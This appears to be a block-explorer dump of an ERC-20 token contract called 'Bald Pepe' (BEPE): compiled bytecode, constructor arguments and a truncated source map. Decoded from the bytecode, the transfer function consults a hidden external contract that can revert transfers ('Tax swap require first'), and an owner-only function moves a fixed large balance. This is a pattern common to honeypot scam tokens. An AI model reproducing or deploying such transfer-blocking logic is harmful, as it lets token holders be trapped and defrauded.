9f11d1b0c0dadb66327655db3df1000000000000000000000000000000000000000000000000000000000000000942616c642050657065000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000044245504500000000000000000000000000000000000000000000000000000000
Deployed Bytecode
0x608060405234801561000f575f80fd5b50600436106100fe575f3560e01c8063715018a611610095578063a457c2d711610064578063a457c2d71461029c578063a9059cbb146102cc578063dd62ed3e146102fc578063f2fde38b1461032c576100fe565b8063715018a6146102385780638da5cb5b1461024257806395618f301461026057806395d89b411461027e576100fe565b806323b872dd116100d157806323b872dd1461018a578063313ce567146101ba57806339509351146101d857806370a0823114610208576100fe565b80630485df531461010257806306fdde031461011e578063095ea7b31461013c57806318160ddd1461016c575b5f80fd5b61011c60048036038101906101179190610f6d565b610348565b005b6101266103c5565b6040516101339190611022565b60405180910390f35b61015660048036038101906101519190611075565b610455565b60405161016391906110cd565b60405180910390f35b610174610477565b60405161018191906110f5565b60405180910390f35b6101a4600480360381019061019f919061110e565b610480565b6040516101b191906110cd565b60405180910390f35b6101c26104ae565b6040516101cf9190611179565b60405180910390f35b6101f260048036038101906101ed9190611075565b6104b6565b6040516101ff91906110cd565b60405180910390f35b610222600480360381019061021d9190610f6d565b6104ec565b60405161022f91906110f5565b60405180910390f35b610240610531565b005b61024a610544565b60405161025791906111a1565b60405180910390f35b61026861056c565b6040516102759190611215565b60405180910390f35b610286610591565b6040516102939190611022565b60405180910390f35b6102b660048036038101906102b19190611075565b610621565b6040516102c391906110cd565b60405180910390f35b6102e660048036038101906102e19190611075565b610696565b6040516102f391906110cd565b60405180910390f35b6103166004803603810190610311919061122e565b6106b8565b60405161032391906110f5565b60405180910390f35b61034660048036038101906103419190610f6d565b61073a565b005b6103506107bc565b5f61035a336104ec565b90506b409f9cbc7c4a04c22000000081146103aa576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016103a1906112b6565b60405180910390fd5b6103c133836b409f9cbc7c4a04c22000000061083a565b5050565b6060600480546103d490611301565b80601f016020809104026020016040519081016040528092919081815260200182805461040090611301565b801561044b5780601f106104225761010080835404028352916020019161044b565b820191905f5260205f20905b81548152906001019060200180831161042e57829003601f168201915b5050505050905090565b5f8061045f610bed565b905061046c818585610bf4565b600191505092915050565b5f600354905090565b5f8061048a610bed565b9050610497858285610db7565b6104a285858561083a565b60019150509392505050565b5f6012905090565b5f806104c0610bed565b90506104e18185856104d285896106b8565b6104dc919061135e565b610bf4565b600191505092915050565b5f805f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b6105396107bc565b6105425f610e42565b565b5f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6060600580546105a090611301565b80601f01602080910402602001604051908101604052809291908181526020018280546105cc90611301565b80156106175780601f106105ee57610100808354040283529160200191610617565b820191905f5260205f20905b8154815290600101906020018083116105fa57829003601f168201915b5050505050905090565b5f8061062b610bed565b90505f61063882866106b8565b90508381101561067d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161067490611401565b60405180910390fd5b61068a8286868403610bf4565b60019250505092915050565b5f806106a0610bed565b90506106ad81858561083a565b600191505092915050565b5f60025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b6107426107bc565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036107b0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107a79061148f565b60405180910390fd5b6107b981610e42565b50565b6107c4610bed565b73ffffffffffffffffffffffffffffffffffffffff166107e2610544565b73ffffffffffffffffffffffffffffffffffffffff1614610838576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161082f906114f7565b60405180910390fd5b565b60015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16637c19749b846040518263ffffffff1660e01b815260040161089491906111a1565b602060405180830381865afa1580156108af573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906108d3919061153f565b15610913576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161090a906115b4565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610981576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161097890611642565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036109ef576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109e6906116d0565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610a5d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a54906116d0565b60405180910390fd5b610a68838383610f05565b5f805f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905081811015610aeb576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ae29061175e565b60405180910390fd5b8181035f808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550815f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610bd491906110f5565b60405180910390a3610be7848484610f0a565b50505050565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610c62576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c59906117ec565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610cd0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cc79061187a565b60405180910390fd5b8060025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610daa91906110f5565b60405180910390a3505050565b5f610dc284846106b8565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610e3c5781811015610e2e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e25906118e2565b60405180910390fd5b610e3b8484848403610bf4565b5b50505050565b5f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690508160065f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b505050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f610f3c82610f13565b9050919050565b610f4c81610f32565b8114610f56575f80fd5b50565b5f81359050610f6781610f43565b92915050565b5f60208284031215610f8257610f81610f0f565b5b5f610f8f84828501610f59565b91505092915050565b5f81519050919050565b5f82825260208201905092915050565b5f5b83811015610fcf578082015181840152602081019050610fb4565b5f8484015250505050565b5f601f19601f8301169050919050565b5f610ff482610f98565b610ffe8185610fa2565b935061100e818560208601610fb2565b61101781610fda565b840191505092915050565b5f6020820190508181035f83015261103a8184610fea565b905092915050565b5f819050919050565b61105481611042565b811461105e575f80fd5b50565b5f8135905061106f8161104b565b92915050565b5f806040838503121561108b5761108a610f0f565b5b5f61109885828601610f59565b92505060206110a985828601611061565b9150509250929050565b5f8115159050919050565b6110c7816110b3565b82525050565b5f6020820190506110e05f8301846110be565b92915050565b6110ef81611042565b82525050565b5f6020820190506111085f8301846110e6565b92915050565b5f805f6060848603121561112557611124610f0f565b5b5f61113286828701610f59565b935050602061114386828701610f59565b925050604061115486828701611061565b9150509250925092565b5f60ff82169050919050565b6111738161115e565b82525050565b5f60208201905061118c5f83018461116a565b92915050565b61119b81610f32565b82525050565b5f6020820190506111b45f830184611192565b92915050565b5f819050919050565b5f6111dd6111d86111d384610f13565b6111ba565b610f13565b9050919050565b5f6111ee826111c3565b9050919050565b5f6111ff826111e4565b9050919050565b61120f816111f5565b82525050565b5f6020820190506112285f830184611206565b92915050565b5f806040838503121561124457611243610f0f565b5b5f61125185828601610f59565b925050602061126285828601610f59565b9150509250929050565b7f546f6b656e2073656e7420666f72206f776e65720000000000000000000000005f82015250565b5f6112a0601483610fa2565b91506112ab8261126c565b602082019050919050565b5f6020820190508181035f8301526112cd81611294565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061131857607f821691505b60208210810361132b5761132a6112d4565b5b50919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f61136882611042565b915061137383611042565b925082820190508082111561138b5761138a611331565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f775f8201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b5f6113eb602583610fa2565b91506113f682611391565b604082019050919050565b5f6020820190508181035f830152611418816113df565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f611479602683610fa2565b91506114848261141f565b604082019050919050565b5f6020820190508181035f8301526114a68161146d565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f6114e1602083610fa2565b91506114ec826114ad565b602082019050919050565b5f6020820190508181035f83015261150e816114d5565b9050919050565b61151e816110b3565b8114611528575f80fd5b50565b5f8151905061153981611515565b92915050565b5f6020828403121561155457611553610f0f565b5b5f6115618482850161152b565b91505092915050565b7f54617820737761702072657175697265206669727374000000000000000000005f82015250565b5f61159e601683610fa2565b91506115a98261156a565b602082019050919050565b5f6020820190508181035f8301526115cb81611592565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f61162c602583610fa2565b9150611637826115d2565b604082019050919050565b5f6020820190508181035f83015261165981611620565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f6116ba602383610fa2565b91506116c582611660565b604082019050919050565b5f6020820190508181035f8301526116e7816116ae565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74206578636565647320625f8201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b5f611748602683610fa2565b9150611753826116ee565b604082019050919050565b5f6020820190508181035f8301526117758161173c565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f6117d6602483610fa2565b91506117e18261177c565b604082019050919050565b5f6020820190508181035f830152611803816117ca565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f611864602283610fa2565b915061186f8261180a565b604082019050919050565b5f6020820190508181035f83015261189181611858565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000005f82015250565b5f6118cc601d83610fa2565b91506118d782611898565b602082019050919050565b5f6020820190508181035f8301526118f9816118c0565b905091905056fea2646970667358221220d226616f1a30ec244cc26585bb6bca3f1e795d463ccf94ded17398251f56312a64736f6c63430008140033
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
00000000000000000000000000000000000000000000000000000000000000e000000000000000000000000000000000000000000000000000000000000001200000000000000000000000000000000000000000000000000000000064edd8c500000000000000000000000000000000000000000000000000000001c62972ef0000000000000000000000000000000000000000000000000000000064ede47d00000000000000000000000000000000000000000000000000000000000000010000000000000000000000008620ccbc41139f11d1b0c0dadb66327655db3df1000000000000000000000000000000000000000000000000000000000000000942616c642050657065000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000044245504500000000000000000000000000000000000000000000000000000000
-----Decoded View---------------
Arg [0] : coin_ (string): Bald Pepe
Arg [1] : symbol_ (string): BEPE
Arg [2] : deploytime (uint256): 1693309125
Arg [3] : hashtx (uint256): 7619572463
Arg [4] : tradeopen (uint256): 1693312125
Arg [5] : taxvar (uint256): 1
Arg [6] : _taxteam (address): 0x8620Ccbc41139f11d1b0C0DaDB66327655Db3DF1
-----Encoded View---------------
11 Constructor Arguments found :
Arg [0] : 00000000000000000000000000000000000000000000000000000000000000e0
Arg [1] : 0000000000000000000000000000000000000000000000000000000000000120
Arg [2] : 0000000000000000000000000000000000000000000000000000000064edd8c5
Arg [3] : 00000000000000000000000000000000000000000000000000000001c62972ef
Arg [4] : 0000000000000000000000000000000000000000000000000000000064ede47d
Arg [5] : 0000000000000000000000000000000000000000000000000000000000000001
Arg [6] : 0000000000000000000000008620ccbc41139f11d1b0c0dadb66327655db3df1
Arg [7] : 0000000000000000000000000000000000000000000000000000000000000009
Arg [8] : 42616c6420506570650000000000000000000000000000000000000000000000
Arg [9] : 0000000000000000000000000000000000000000000000000000000000000004
Arg [10] : 4245504500000000000000000000000000000000000000000000000000000000
Deployed Bytecode Sourcemap
12796:648:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;13205:236;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;6138:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7860:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6629:108;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8069:295;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6471:93;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8374:238;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6800:127;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1721:103;;;:::i;:::-;;1073:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5386:21;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6357:104;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8623:436;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7133:193;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7389:151;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1979:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;13205:236;959:13;:11;:13::i;:::-;13278:14:::1;13295:21;13305:10;13295:9;:21::i;:::-;13278:38;;12873:20;13335:6;:17;13327:50;;;;;;;;;;;;:::i;:::-;;;;;;;;;13390:42;13400:10;13412;12873:20;13390:9;:42::i;:::-;13267:174;13205:236:::0;:::o;6138:100::-;6192:13;6225:5;6218:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;6138:100;:::o;7860:201::-;7943:4;7960:13;7976:12;:10;:12::i;:::-;7960:28;;7999:32;8008:5;8015:7;8024:6;7999:8;:32::i;:::-;8049:4;8042:11;;;7860:201;;;;:::o;6629:108::-;6690:7;6717:12;;6710:19;;6629:108;:::o;8069:295::-;8200:4;8217:15;8235:12;:10;:12::i;:::-;8217:30;;8258:38;8274:4;8280:7;8289:6;8258:15;:38::i;:::-;8307:27;8317:4;8323:2;8327:6;8307:9;:27::i;:::-;8352:4;8345:11;;;8069:295;;;;;:::o;6471:93::-;6529:5;6554:2;6547:9;;6471:93;:::o;8374:238::-;8462:4;8479:13;8495:12;:10;:12::i;:::-;8479:28;;8518:64;8527:5;8534:7;8571:10;8543:25;8553:5;8560:7;8543:9;:25::i;:::-;:38;;;;:::i;:::-;8518:8;:64::i;:::-;8600:4;8593:11;;;8374:238;;;;:::o;6800:127::-;6874:7;6901:9;:18;6911:7;6901:18;;;;;;;;;;;;;;;;6894:25;;6800:127;;;:::o;1721:103::-;959:13;:11;:13::i;:::-;1786:30:::1;1813:1;1786:18;:30::i;:::-;1721:103::o:0;1073:87::-;1119:7;1146:6;;;;;;;;;;;1139:13;;1073:87;:::o;5386:21::-;;;;;;;;;;;;;:::o;6357:104::-;6413:13;6446:7;6439:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;6357:104;:::o;8623:436::-;8716:4;8733:13;8749:12;:10;:12::i;:::-;8733:28;;8772:24;8799:25;8809:5;8816:7;8799:9;:25::i;:::-;8772:52;;8863:15;8843:16;:35;;8835:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;8956:60;8965:5;8972:7;9000:15;8981:16;:34;8956:8;:60::i;:::-;9047:4;9040:11;;;;8623:436;;;;:::o;7133:193::-;7212:4;7229:13;7245:12;:10;:12::i;:::-;7229:28;;7268;7278:5;7285:2;7289:6;7268:9;:28::i;:::-;7314:4;7307:11;;;7133:193;;;;:::o;7389:151::-;7478:7;7505:11;:18;7517:5;7505:18;;;;;;;;;;;;;;;:27;7524:7;7505:27;;;;;;;;;;;;;;;;7498:34;;7389:151;;;;:::o;1979:201::-;959:13;:11;:13::i;:::-;2088:1:::1;2068:22;;:8;:22;;::::0;2060:73:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;2144:28;2163:8;2144:18;:28::i;:::-;1979:201:::0;:::o;1238:132::-;1313:12;:10;:12::i;:::-;1302:23;;:7;:5;:7::i;:::-;:23;;;1294:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;1238:132::o;9529:984::-;9661:7;;;;;;;;;;;:18;;;9680:4;9661:24;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;9660:25;9652:60;;;;;;;;;;;;:::i;:::-;;;;;;;;;9747:1;9731:18;;:4;:18;;;9723:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;9824:1;9810:16;;:2;:16;;;9802:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;9899:1;9885:16;;:2;:16;;;9877:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;9952:38;9973:4;9979:2;9983:6;9952:20;:38::i;:::-;10003:19;10025:9;:15;10035:4;10025:15;;;;;;;;;;;;;;;;10003:37;;10074:6;10059:11;:21;;10051:72;;;;;;;;;;;;:::i;:::-;;;;;;;;;10191:6;10177:11;:20;10159:9;:15;10169:4;10159:15;;;;;;;;;;;;;;;:38;;;;10394:6;10377:9;:13;10387:2;10377:13;;;;;;;;;;;;;;;;:23;;;;;;;;;;;10444:2;10429:26;;10438:4;10429:26;;;10448:6;10429:26;;;;;;:::i;:::-;;;;;;;;10468:37;10488:4;10494:2;10498:6;10468:19;:37::i;:::-;9641:872;9529:984;;;:::o;249:98::-;302:7;329:10;322:17;;249:98;:::o;11362:380::-;11515:1;11498:19;;:5;:19;;;11490:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;11596:1;11577:21;;:7;:21;;;11569:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;11680:6;11650:11;:18;11662:5;11650:18;;;;;;;;;;;;;;;:27;11669:7;11650:27;;;;;;;;;;;;;;;:36;;;;11718:7;11702:32;;11711:5;11702:32;;;11727:6;11702:32;;;;;;:::i;:::-;;;;;;;;11362:380;;;:::o;12033:453::-;12168:24;12195:25;12205:5;12212:7;12195:9;:25::i;:::-;12168:52;;12255:17;12235:16;:37;12231:248;;12317:6;12297:16;:26;;12289:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;12401:51;12410:5;12417:7;12445:6;12426:16;:25;12401:8;:51::i;:::-;12231:248;12157:329;12033:453;;;:::o;2340:191::-;2414:16;2433:6;;;;;;;;;;;2414:25;;2459:8;2450:6;;:17;;;;;;;;;;;;;;;;;;2514:8;2483:40;;2504:8;2483:40;;;;;;;;;;;;2403:128;2340:191;:::o;12496:125::-;;;;:::o;12631:124::-;;;;:::o;88:117:1:-;197:1;194;187:12;334:126;371:7;411:42;404:5;400:54;389:65;;334:126;;;:::o;466:96::-;503:7;532:24;550:5;532:24;:::i;:::-;521:35;;466:96;;;:::o;568:122::-;641:24;659:5;641:24;:::i;:::-;634:5;631:35;621:63;;680:1;677;670:12;621:63;568:122;:::o;696:139::-;742:5;780:6;767:20;758:29;;796:33;823:5;796:33;:::i;:::-;696:139;;;;:::o;841:329::-;900:6;949:2;937:9;928:7;924:23;920:32;917:119;;;955:79;;:::i;:::-;917:119;1075:1;1100:53;1145:7;1136:6;1125:9;1121:22;1100:53;:::i;:::-;1090:63;;1046:117;841:329;;;;:::o;1176:99::-;1228:6;1262:5;1256:12;1246:22;;1176:99;;;:::o;1281:169::-;1365:11;1399:6;1394:3;1387:19;1439:4;1434:3;1430:14;1415:29;;1281:169;;;;:::o;1456:246::-;1537:1;1547:113;1561:6;1558:1;1555:13;1547:113;;;1646:1;1641:3;1637:11;1631:18;1627:1;1622:3;1618:11;1611:39;1583:2;1580:1;1576:10;1571:15;;1547:113;;;1694:1;1685:6;1680:3;1676:16;1669:27;1518:184;1456:246;;;:::o;1708:102::-;1749:6;1800:2;1796:7;1791:2;1784:5;1780:14;1776:28;1766:38;;1708:102;;;:::o;1816:377::-;1904:3;1932:39;1965:5;1932:39;:::i;:::-;1987:71;2051:6;2046:3;1987:71;:::i;:::-;1980:78;;2067:65;2125:6;2120:3;2113:4;2106:5;2102:16;2067:65;:::i;:::-;2157:29;2179:6;2157:29;:::i;:::-;2152:3;2148:39;2141:46;;1908:285;1816:377;;;;:::o;2199:313::-;2312:4;2350:2;2339:9;2335:18;2327:26;;2399:9;2393:4;2389:20;2385:1;2374:9;2370:17;2363:47;2427:78;2500:4;2491:6;2427:78;:::i;:::-;2419:86;;2199:313;;;;:::o;2518:77::-;2555:7;2584:5;2573:16;;2518:77;;;:::o;2601:122::-;2674:24;2692:5;2674:24;:::i;:::-;2667:5;2664:35;2654:63;;2713:1;2710;2703:12;2654:63;2601:122;:::o;2729:139::-;2775:5;2813:6;2800:20;2791:29;;2829:33;2856:5;2829:33;:::i;:::-;2729:139;;;;:::o;2874:474::-;2942:6;2950;2999:2;2987:9;2978:7;2974:23;2970:32;2967:119;;;3005:79;;:::i;:::-;2967:119;3125:1;3150:53;3195:7;3186:6;3175:9;3171:22;3150:53;:::i;:::-;3140:63;;3096:117;3252:2;3278:53;3323:7;3314:6;3303:9;3299:22;3278:53;:::i;:::-;3268:63;;3223:118;2874:474;;;;;:::o;3354:90::-;3388:7;3431:5;3424:13;3417:21;3406:32;;3354:90;;;:::o;3450:109::-;3531:21;3546:5;3531:21;:::i;:::-;3526:3;3519:34;3450:109;;:::o;3565:210::-;3652:4;3690:2;3679:9;3675:18;3667:26;;3703:65;3765:1;3754:9;3750:17;3741:6;3703:65;:::i;:::-;3565:210;;;;:::o;3781:118::-;3868:24;3886:5;3868:24;:::i;:::-;3863:3;3856:37;3781:118;;:::o;3905:222::-;3998:4;4036:2;4025:9;4021:18;4013:26;;4049:71;4117:1;4106:9;4102:17;4093:6;4049:71;:::i;:::-;3905:222;;;;:::o;4133:619::-;4210:6;4218;4226;4275:2;4263:9;4254:7;4250:23;4246:32;4243:119;;;4281:79;;:::i;:::-;4243:119;4401:1;4426:53;4471:7;4462:6;4451:9;4447:22;4426:53;:::i;:::-;4416:63;;4372:117;4528:2;4554:53;4599:7;4590:6;4579:9;4575:22;4554:53;:::i;:::-;4544:63;;4499:118;4656:2;4682:53;4727:7;4718:6;4707:9;4703:22;4682:53;:::i;:::-;4672:63;;4627:118;4133:619;;;;;:::o;4758:86::-;4793:7;4833:4;4826:5;4822:16;4811:27;;4758:86;;;:::o;4850:112::-;4933:22;4949:5;4933:22;:::i;:::-;4928:3;4921:35;4850:112;;:::o;4968:214::-;5057:4;5095:2;5084:9;5080:18;5072:26;;5108:67;5172:1;5161:9;5157:17;5148:6;5108:67;:::i;:::-;4968:214;;;;:::o;5188:118::-;5275:24;5293:5;5275:24;:::i;:::-;5270:3;5263:37;5188:118;;:::o;5312:222::-;5405:4;5443:2;5432:9;5428:18;5420:26;;5456:71;5524:1;5513:9;5509:17;5500:6;5456:71;:::i;:::-;5312:222;;;;:::o;5540:60::-;5568:3;5589:5;5582:12;;5540:60;;;:::o;5606:142::-;5656:9;5689:53;5707:34;5716:24;5734:5;5716:24;:::i;:::-;5707:34;:::i;:::-;5689:53;:::i;:::-;5676:66;;5606:142;;;:::o;5754:126::-;5804:9;5837:37;5868:5;5837:37;:::i;:::-;5824:50;;5754:126;;;:::o;5886:140::-;5950:9;5983:37;6014:5;5983:37;:::i;:::-;5970:50;;5886:140;;;:::o;6032:159::-;6133:51;6178:5;6133:51;:::i;:::-;6128:3;6121:64;6032:159;;:::o;6197:250::-;6304:4;6342:2;6331:9;6327:18;6319:26;;6355:85;6437:1;6426:9;6422:17;6413:6;6355:85;:::i;:::-;6197:250;;;;:::o;6453:474::-;6521:6;6529;6578:2;6566:9;6557:7;6553:23;6549:32;6546:119;;;6584:79;;:::i;:::-;6546:119;6704:1;6729:53;6774:7;6765:6;6754:9;6750:22;6729:53;:::i;:::-;6719:63;;6675:117;6831:2;6857:53;6902:7;6893:6;6882:9;6878:22;6857:53;:::i;:::-;6847:63;;6802:118;6453:474;;;;;:::o;6933:170::-;7073:22;7069:1;7061:6;7057:14;7050:46;6933:170;:::o;7109:366::-;7251:3;7272:67;7336:2;7331:3;7272:67;:::i;:::-;7265:74;;7348:93;7437:3;7348:93;:::i;:::-;7466:2;7461:3;7457:12;7450:19;;7109:366;;;:::o;7481:419::-;7647:4;7685:2;7674:9;7670:18;7662:26;;7734:9;7728:4;7724:20;7720:1;7709:9;7705:17;7698:47;7762:131;7888:4;7762:131;:::i;:::-;7754:139;;7481:419;;;:::o;7906:180::-;7954:77;7951:1;7944:88;8051:4;8048:1;8041:15;8075:4;8072:1;8065:15;8092:320;8136:6;8173:1;8167:4;8163:12;8153:22;;8220:1;8214:4;8210:12;8241:18;8231:81;;8297:4;8289:6;8285:17;8275:27;;8231:81;8359:2;8351:6;8348:14;8328:18;8325:38;8322:84;;8378:18;;:::i;:::-;8322:84;8143:269;8092:320;;;:::o;8418:180::-;8466:77;8463:1;8456:88;8563:4;8560:1;8553:15;8587:4;8584:1;8577:15;8604:191;8644:3;8663:20;8681:1;8663:20;:::i;:::-;8658:25;;8697:20;8715:1;8697:20;:::i;:::-;8692:25;;8740:1;8737;8733:9;8726:16;;8761:3;8758:1;8755:10;8752:36;;;8768:18;;:::i;:::-;8752:36;8604:191;;;;:::o;8801:224::-;8941:34;8937:1;8929:6;8925:14;8918:58;9010:7;9005:2;8997:6;8993:15;8986:32;8801:224;:::o;9031:366::-;9173:3;9194:67;9258:2;9253:3;9194:67;:::i;:::-;9187:74;;9270:93;9359:3;9270:93;:::i;:::-;9388:2;9383:3;9379:12;9372:19;;9031:366;;;:::o;9403:419::-;9569:4;9607:2;9596:9;9592:18;9584:26;;9656:9;9650:4;9646:20;9642:1;9631:9;9627:17;9620:47;9684:131;9810:4;9684:131;:::i;:::-;9676:139;;9403:419;;;:::o;9828:225::-;9968:34;9964:1;9956:6;9952:14;9945:58;10037:8;10032:2;10024:6;10020:15;10013:33;9828:225;:::o;10059:366::-;10201:3;10222:67;10286:2;10281:3;10222:67;:::i;:::-;10215:74;;10298:93;10387:3;10298:93;:::i;:::-;10416:2;10411:3;10407:12;10400:19;;10059:366;;;:::o;10431:419::-;10597:4;10635:2;10624:9;10620:18;10612:26;;10684:9;10678:4;10674:20;10670:1;10659:9;10655:17;10648:47;10712:131;10838:4;10712:131;:::i;:::-;10704:139;;10431:419;;;:::o;10856:182::-;10996:34;10992:1;10984:6;10980:14;10973:58;10856:182;:::o;11044:366::-;11186:3;11207:67;11271:2;11266:3;11207:67;:::i;:::-;11200:74;;11283:93;11372:3;11283:93;:::i;:::-;11401:2;11396:3;11392:12;11385:19;;11044:366;;;:::o;11416:419::-;11582:4;11620:2;11609:9;11605:18;11597:26;;11669:9;11663:4;11659:20;11655:1;11644:9;11640:17;11633:47;11697:131;11823:4;11697:131;:::i;:::-;11689:139;;11416:419;;;:::o;11841:116::-;11911:21;11926:5;11911:21;:::i;:::-;11904:5;11901:32;11891:60;;11947:1;11944;11937:12;11891:60;11841:116;:::o;11963:137::-;12017:5;12048:6;12042:13;12033:22;;12064:30;12088:5;12064:30;:::i;:::-;11963:137;;;;:::o;12106:345::-;12173:6;12222:2;12210:9;12201:7;12197:23;12193:32;12190:119;;;12228:79;;:::i;:::-;12190:119;12348:1;12373:61;12426:7;12417:6;12406:9;12402:22;12373:61;:::i;:::-;12363:71;;12319:125;12106:345;;;;:::o;12457:172::-;12597:24;12593:1;12585:6;